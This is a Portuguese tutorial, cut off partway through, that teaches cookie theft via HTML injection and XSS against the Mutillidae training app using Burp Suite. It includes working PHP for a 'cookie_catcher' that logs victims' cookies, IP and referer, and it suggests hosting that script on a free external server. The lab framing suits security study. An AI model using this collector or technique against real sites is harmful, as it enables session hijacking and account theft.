Roubando Cookies Atrav S De HTML Injection
444 palavras
2 páginas
O que é HTML injection? É um tipo de ataque que utiliza códigos HTML para injetar scripts, que serão executados de acordo com o objetivo de quem injeta. Neste caso, iremos redirecionar o usuário que acessará nosso link para uma outra página de nossa escolha, que irá roubar seus cookies. Ou seja, utilizaremos ainda outra vulnerabilidade em conjunto com o HTML injection, que será o Cross Site Scripting (XSS). A vulnerabilidade Utilizaremos o ambiente de testes Mutillidae para testarmos essa vulnerabilidade. O Burp
Suite será usado para testála, e iremos utilizar também uma página instalada localmente, chamada “cookie_catcher.php” (que você poderia fazer o upload em qualquer site de host grátis que se encontra na internet). Iremos testar a página “Add to your blog” do Mutillidae. Aqui está o arquivo cookie_catcher.php: <?php
$cookie = $_GET['c'];
$date=date("j F, Y, g:i a");;
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.php', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br /> IP: '.$ip. '<br /> Date and time: ' .$date.'<br /> Referer: '
.$referer.'<br /><br />'); fclose($fp); header ("javascript:history.back()");
?>
Tutorial Primeiro utilize o Burp Suite como seu proxy, desligue a interceptação por enquanto. Agora, acesse a página “Add to your blog”, do Mutillidae:
Escreva qualquer coisa na caixa de texto e salve. Observe que há um registro de tudo o que você escreve:
Salve novamente uma outra mensagem, mas dessa vez com o interceptador do Burp ligado:
Deve aparecer algo assim:
Envie isso ao Repeater e aperte Go. Busque a palavra Teste2, e verá que você tem dois registros: um que você escreveu na primeira vez, e outro que você reenviou com o
Repeater:
Nossa palavra está dentro de uma tabela HTML. Vamos testar agora, novamente, o que ocorre se a tag for fechada a partir do texto que enviamos, também temos que “fechar” a outra tag que sobrou ao lado:
Clique em “Go” e veja